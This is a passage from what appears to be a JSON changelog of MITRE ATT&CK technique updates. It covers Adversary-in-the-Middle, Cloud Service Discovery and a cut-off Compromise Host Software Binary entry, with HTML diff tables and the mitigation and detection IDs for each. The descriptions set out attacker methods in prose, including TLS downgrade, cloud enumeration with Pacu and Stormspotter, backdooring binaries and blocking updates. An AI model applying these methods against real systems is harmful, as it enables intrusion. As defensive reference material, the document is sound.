class=\"diff_header\">></td><td nowrap=\"nowrap\">volexity_0day_sophos_FW)(Citation:&nbsp;Token&nbsp;tactics)&nbsp;[Downgrade</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Attack](https://attack.mitre.org/techniques/T1<span class=\"diff_sub\">5</span>6<span class=\"diff_chg\">2/010)s&nbsp;can</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Attack](https://attack.mitre.org/techniques/T16<span class=\"diff_chg\">89)s&nbsp;can&nbsp;als</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">&nbsp;also</span>&nbsp;be&nbsp;used&nbsp;to&nbsp;establish&nbsp;an&nbsp;AiTM&nbsp;position,&nbsp;such&nbsp;as&nbsp;by&nbsp;nego</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">o</span>&nbsp;be&nbsp;used&nbsp;to&nbsp;establish&nbsp;an&nbsp;AiTM&nbsp;position,&nbsp;such&nbsp;as&nbsp;by&nbsp;negotiat</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tiating&nbsp;a&nbsp;less&nbsp;secure,&nbsp;deprecated,&nbsp;or&nbsp;weaker&nbsp;version&nbsp;of&nbsp;comm</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ing&nbsp;a&nbsp;less&nbsp;secure,&nbsp;deprecated,&nbsp;or&nbsp;weaker&nbsp;version&nbsp;of&nbsp;communic</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">unication&nbsp;protocol&nbsp;(SSL/TLS)&nbsp;or&nbsp;encryption&nbsp;algorithm.(Citati</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ation&nbsp;protocol&nbsp;(SSL/TLS)&nbsp;or&nbsp;encryption&nbsp;algorithm.(Citation:&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">on:&nbsp;mitm_tls_downgrade_att)(Citation:&nbsp;taxonomy_downgrade_att</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">mitm_tls_downgrade_att)(Citation:&nbsp;taxonomy_downgrade_att_tls</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">_tls)(Citation:&nbsp;tlseminar_downgrade_att)&nbsp;&nbsp;Adversaries&nbsp;may&nbsp;al</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">)(Citation:&nbsp;tlseminar_downgrade_att)&nbsp;&nbsp;Adversaries&nbsp;may&nbsp;also&nbsp;l</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">so&nbsp;leverage&nbsp;the&nbsp;AiTM&nbsp;position&nbsp;to&nbsp;attempt&nbsp;to&nbsp;monitor&nbsp;and/or&nbsp;m</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">everage&nbsp;the&nbsp;AiTM&nbsp;position&nbsp;to&nbsp;attempt&nbsp;to&nbsp;monitor&nbsp;and/or&nbsp;modif</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">odify&nbsp;traffic,&nbsp;such&nbsp;as&nbsp;in&nbsp;[Transmitted&nbsp;Data&nbsp;Manipulation](ht</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">y&nbsp;traffic,&nbsp;such&nbsp;as&nbsp;in&nbsp;[Transmitted&nbsp;Data&nbsp;Manipulation](https:</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tps://attack.mitre.org/techniques/T1565/002).&nbsp;Adversaries&nbsp;ca</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">//attack.mitre.org/techniques/T1565/002).&nbsp;Adversaries&nbsp;can&nbsp;se</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n&nbsp;setup&nbsp;a&nbsp;position&nbsp;similar&nbsp;to&nbsp;AiTM&nbsp;to&nbsp;prevent&nbsp;traffic&nbsp;from&nbsp;f</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tup&nbsp;a&nbsp;position&nbsp;similar&nbsp;to&nbsp;AiTM&nbsp;to&nbsp;prevent&nbsp;traffic&nbsp;from&nbsp;flowi</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">lowing&nbsp;to&nbsp;the&nbsp;appropriate&nbsp;destination,&nbsp;potentially&nbsp;to&nbsp;<span class=\"diff_chg\">[Impai</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ng&nbsp;to&nbsp;the&nbsp;appropriate&nbsp;destination,&nbsp;potentially&nbsp;to&nbsp;<span class=\"diff_chg\">impair&nbsp;def</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">r&nbsp;Defenses](https://attack.mitre.org/techniques/T1562)&nbsp;and/o</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">enses&nbsp;and/or&nbsp;in&nbsp;support&nbsp;of&nbsp;a</span>&nbsp;[Network&nbsp;Denial&nbsp;of&nbsp;Service](htt</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">r&nbsp;in&nbsp;support&nbsp;of&nbsp;a</span>&nbsp;[Network&nbsp;Denial&nbsp;of&nbsp;Service](https://attack</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ps://attack.mitre.org/techniques/T1498).</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">.mitre.org/techniques/T1498).</td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [
                            "M1017: User Training",
                            "M1030: Network Segmentation",
                            "M1031: Network Intrusion Prevention",
                            "M1035: Limit Access to Resource Over Network",
                            "M1037: Filter Network Traffic",
                            "M1041: Encrypt Sensitive Information",
                            "M1042: Disable or Remove Feature or Program"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0296: Detect Adversary-in-the-Middle via Network and Configuration Anomalies"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-08-30 13:01:10.120000+00:00",
                    "modified": "2026-04-17 14:17:35.798000+00:00",
                    "name": "Cloud Service Discovery",
                    "description": "An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.\n\nAdversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)\n\nFor example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)\n\nAdversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through [Disable or Modify Tools](https://attack.mitre.org/techniques/T1685) or [Disable or Modify Cloud Log](https://attack.mitre.org/techniques/T1685/002).",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "discovery"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1526",
                            "external_id": "T1526"
                        },
                        {
                            "source_name": "Azure AD Graph API",
                            "description": "Microsoft. (2016, March 26). Operations overview | Graph API concepts. Retrieved June 18, 2020.",
                            "url": "https://docs.microsoft.com/en-us/previous-versions/azure/ad/graph/howto/azure-ad-graph-api-operations-overview"
                        },
                        {
                            "source_name": "Azure - Resource Manager API",
                            "description": "Microsoft. (2019, May 20). Azure Resource Manager. Retrieved June 17, 2020.",
                            "url": "https://docs.microsoft.com/en-us/rest/api/resources/"
                        },
                        {
                            "source_name": "Azure - Stormspotter",
                            "description": "Microsoft. (2020). Azure Stormspotter GitHub. Retrieved June 17, 2020.",
                            "url": "https://github.com/Azure/Stormspotter"
                        },
                        {
                            "source_name": "GitHub Pacu",
                            "description": "Rhino Security Labs. (2019, August 22). Pacu. Retrieved October 17, 2019.",
                            "url": "https://github.com/RhinoSecurityLabs/pacu"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Suzy Schapperle - Microsoft Azure Red Team",
                        "Praetorian",
                        "Thanabodi Phrakhun, I-SECURE",
                        "Arun Seelagan, CISA"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "IaaS",
                        "Identity Provider",
                        "Office Suite",
                        "SaaS"
                    ],
                    "x_mitre_version": "1.4",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-17 14:17:35.798000+00:00\", \"old_value\": \"2025-10-24 17:49:30.791000+00:00\"}, \"root['description']\": {\"new_value\": \"An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.\\n\\nAdversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)\\n\\nFor example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)\\n\\nAdversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through [Disable or Modify Tools](https://attack.mitre.org/techniques/T1685) or [Disable or Modify Cloud Log](https://attack.mitre.org/techniques/T1685/002).\", \"old_value\": \"An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.\\n\\nAdversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)\\n\\nFor example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)\\n\\nAdversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001) or [Disable or Modify Cloud Logs](https://attack.mitre.org/techniques/T1562/008).\", \"diff\": \"--- \\n+++ \\n@@ -4,4 +4,4 @@\\n \\n For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)\\n \\n-Adversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001) or [Disable or Modify Cloud Logs](https://attack.mitre.org/techniques/T1562/008).\\n+Adversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through [Disable or Modify Tools](https://attack.mitre.org/techniques/T1685) or [Disable or Modify Cloud Log](https://attack.mitre.org/techniques/T1685/002).\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
                    "previous_version": "1.4",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to22__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to22__0\"><a href=\"#difflib_chg_to22__top\">t</a></td><td class=\"diff_header\" id=\"from22_1\">1</td><td nowrap=\"nowrap\">An&nbsp;adversary&nbsp;may&nbsp;attempt&nbsp;to&nbsp;enumerate&nbsp;the&nbsp;cloud&nbsp;services&nbsp;run</td><td class=\"diff_next\"><a href=\"#difflib_chg_to22__top\">t</a></td><td class=\"diff_header\" id=\"to22_1\">1</td><td nowrap=\"nowrap\">An&nbsp;adversary&nbsp;may&nbsp;attempt&nbsp;to&nbsp;enumerate&nbsp;the&nbsp;cloud&nbsp;services&nbsp;run</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ning&nbsp;on&nbsp;a&nbsp;system&nbsp;after&nbsp;gaining&nbsp;access.&nbsp;These&nbsp;methods&nbsp;can&nbsp;dif</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ning&nbsp;on&nbsp;a&nbsp;system&nbsp;after&nbsp;gaining&nbsp;access.&nbsp;These&nbsp;methods&nbsp;can&nbsp;dif</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">fer&nbsp;from&nbsp;platform-as-a-service&nbsp;(PaaS),&nbsp;to&nbsp;infrastructure-as-</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">fer&nbsp;from&nbsp;platform-as-a-service&nbsp;(PaaS),&nbsp;to&nbsp;infrastructure-as-</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">a-service&nbsp;(IaaS),&nbsp;or&nbsp;software-as-a-service&nbsp;(SaaS).&nbsp;Many&nbsp;serv</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">a-service&nbsp;(IaaS),&nbsp;or&nbsp;software-as-a-service&nbsp;(SaaS).&nbsp;Many&nbsp;serv</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ices&nbsp;exist&nbsp;throughout&nbsp;the&nbsp;various&nbsp;cloud&nbsp;providers&nbsp;and&nbsp;can&nbsp;in</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ices&nbsp;exist&nbsp;throughout&nbsp;the&nbsp;various&nbsp;cloud&nbsp;providers&nbsp;and&nbsp;can&nbsp;in</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">clude&nbsp;Continuous&nbsp;Integration&nbsp;and&nbsp;Continuous&nbsp;Delivery&nbsp;(CI/CD)</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">clude&nbsp;Continuous&nbsp;Integration&nbsp;and&nbsp;Continuous&nbsp;Delivery&nbsp;(CI/CD)</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">,&nbsp;Lambda&nbsp;Functions,&nbsp;Entra&nbsp;ID,&nbsp;etc.&nbsp;They&nbsp;may&nbsp;also&nbsp;include&nbsp;sec</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">,&nbsp;Lambda&nbsp;Functions,&nbsp;Entra&nbsp;ID,&nbsp;etc.&nbsp;They&nbsp;may&nbsp;also&nbsp;include&nbsp;sec</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">urity&nbsp;services,&nbsp;such&nbsp;as&nbsp;AWS&nbsp;GuardDuty&nbsp;and&nbsp;Microsoft&nbsp;Defender</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">urity&nbsp;services,&nbsp;such&nbsp;as&nbsp;AWS&nbsp;GuardDuty&nbsp;and&nbsp;Microsoft&nbsp;Defender</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;for&nbsp;Cloud,&nbsp;and&nbsp;logging&nbsp;services,&nbsp;such&nbsp;as&nbsp;AWS&nbsp;CloudTrail&nbsp;and</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;for&nbsp;Cloud,&nbsp;and&nbsp;logging&nbsp;services,&nbsp;such&nbsp;as&nbsp;AWS&nbsp;CloudTrail&nbsp;and</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Google&nbsp;Cloud&nbsp;Audit&nbsp;Logs.&nbsp;&nbsp;Adversaries&nbsp;may&nbsp;attempt&nbsp;to&nbsp;discov</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Google&nbsp;Cloud&nbsp;Audit&nbsp;Logs.&nbsp;&nbsp;Adversaries&nbsp;may&nbsp;attempt&nbsp;to&nbsp;discov</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">er&nbsp;information&nbsp;about&nbsp;the&nbsp;services&nbsp;enabled&nbsp;throughout&nbsp;the&nbsp;env</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">er&nbsp;information&nbsp;about&nbsp;the&nbsp;services&nbsp;enabled&nbsp;throughout&nbsp;the&nbsp;env</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ironment.&nbsp;Azure&nbsp;tools&nbsp;and&nbsp;APIs,&nbsp;such&nbsp;as&nbsp;the&nbsp;Microsoft&nbsp;Graph&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ironment.&nbsp;Azure&nbsp;tools&nbsp;and&nbsp;APIs,&nbsp;such&nbsp;as&nbsp;the&nbsp;Microsoft&nbsp;Graph&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">API&nbsp;and&nbsp;Azure&nbsp;Resource&nbsp;Manager&nbsp;API,&nbsp;can&nbsp;enumerate&nbsp;resources&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">API&nbsp;and&nbsp;Azure&nbsp;Resource&nbsp;Manager&nbsp;API,&nbsp;can&nbsp;enumerate&nbsp;resources&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">and&nbsp;services,&nbsp;including&nbsp;applications,&nbsp;management&nbsp;groups,&nbsp;res</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">and&nbsp;services,&nbsp;including&nbsp;applications,&nbsp;management&nbsp;groups,&nbsp;res</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ources&nbsp;and&nbsp;policy&nbsp;definitions,&nbsp;and&nbsp;their&nbsp;relationships&nbsp;that&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ources&nbsp;and&nbsp;policy&nbsp;definitions,&nbsp;and&nbsp;their&nbsp;relationships&nbsp;that&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">are&nbsp;accessible&nbsp;by&nbsp;an&nbsp;identity.(Citation:&nbsp;Azure&nbsp;-&nbsp;Resource&nbsp;Ma</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">are&nbsp;accessible&nbsp;by&nbsp;an&nbsp;identity.(Citation:&nbsp;Azure&nbsp;-&nbsp;Resource&nbsp;Ma</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nager&nbsp;API)(Citation:&nbsp;Azure&nbsp;AD&nbsp;Graph&nbsp;API)&nbsp;&nbsp;For&nbsp;example,&nbsp;Storm</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nager&nbsp;API)(Citation:&nbsp;Azure&nbsp;AD&nbsp;Graph&nbsp;API)&nbsp;&nbsp;For&nbsp;example,&nbsp;Storm</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">spotter&nbsp;is&nbsp;an&nbsp;open&nbsp;source&nbsp;tool&nbsp;for&nbsp;enumerating&nbsp;and&nbsp;construct</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">spotter&nbsp;is&nbsp;an&nbsp;open&nbsp;source&nbsp;tool&nbsp;for&nbsp;enumerating&nbsp;and&nbsp;construct</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ing&nbsp;a&nbsp;graph&nbsp;for&nbsp;Azure&nbsp;resources&nbsp;and&nbsp;services,&nbsp;and&nbsp;Pacu&nbsp;is&nbsp;an</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ing&nbsp;a&nbsp;graph&nbsp;for&nbsp;Azure&nbsp;resources&nbsp;and&nbsp;services,&nbsp;and&nbsp;Pacu&nbsp;is&nbsp;an</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;open&nbsp;source&nbsp;AWS&nbsp;exploitation&nbsp;framework&nbsp;that&nbsp;supports&nbsp;severa</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;open&nbsp;source&nbsp;AWS&nbsp;exploitation&nbsp;framework&nbsp;that&nbsp;supports&nbsp;severa</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">l&nbsp;methods&nbsp;for&nbsp;discovering&nbsp;cloud&nbsp;services.(Citation:&nbsp;Azure&nbsp;-&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">l&nbsp;methods&nbsp;for&nbsp;discovering&nbsp;cloud&nbsp;services.(Citation:&nbsp;Azure&nbsp;-&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Stormspotter)(Citation:&nbsp;GitHub&nbsp;Pacu)&nbsp;&nbsp;Adversaries&nbsp;may&nbsp;use&nbsp;th</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Stormspotter)(Citation:&nbsp;GitHub&nbsp;Pacu)&nbsp;&nbsp;Adversaries&nbsp;may&nbsp;use&nbsp;th</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;information&nbsp;gained&nbsp;to&nbsp;shape&nbsp;follow-on&nbsp;behaviors,&nbsp;such&nbsp;as&nbsp;t</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;information&nbsp;gained&nbsp;to&nbsp;shape&nbsp;follow-on&nbsp;behaviors,&nbsp;such&nbsp;as&nbsp;t</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">argeting&nbsp;data&nbsp;or&nbsp;credentials&nbsp;from&nbsp;enumerated&nbsp;services&nbsp;or&nbsp;eva</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">argeting&nbsp;data&nbsp;or&nbsp;credentials&nbsp;from&nbsp;enumerated&nbsp;services&nbsp;or&nbsp;eva</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ding&nbsp;identified&nbsp;defenses&nbsp;through&nbsp;[Disable&nbsp;or&nbsp;Modify&nbsp;Tools](h</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ding&nbsp;identified&nbsp;defenses&nbsp;through&nbsp;[Disable&nbsp;or&nbsp;Modify&nbsp;Tools](h</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ttps://attack.mitre.org/techniques/T156<span class=\"diff_chg\">2</span>/00<span class=\"diff_sub\">1)&nbsp;or&nbsp;[Disable&nbsp;or</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ttps://attack.mitre.org/techniques/T1<span class=\"diff_add\">68</span>5<span class=\"diff_add\">)&nbsp;or&nbsp;[Disable&nbsp;or&nbsp;Mod</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;Modify&nbsp;Cloud&nbsp;Logs](https://attack.mitre.org/techniques/T156</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ify&nbsp;Cloud&nbsp;Log](https://attack.mitre.org/techniques/T1</span>6<span class=\"diff_chg\">85</span>/002</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\"></span>2<span class=\"diff_sub\">/008</span>).</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">).</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0402: Detection Strategy for Cloud Service Discovery"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--960c3c86-1480-4d72-b4e0-8c242e84a5c5",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-02-11 18:18:34.279000+00:00",
                    "modified": "2026-04-16 18:57:08.883000+00:00",
                    "name": "Compromise Host Software Binary",
                    "description": "Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.\n\nAdversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify a software binary such as an SSH client in order to persistently collect credentials during logins (i.e., [Modify Authentication Process](https://attack.mitre.org/techniques/T1556)).(Citation: Google Cloud Mandiant UNC3886 2024)\n\nAn adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary\u2019s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)\n\nAfter modifying a binary, an adversary may attempt to impair defenses by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).(Citation: Google 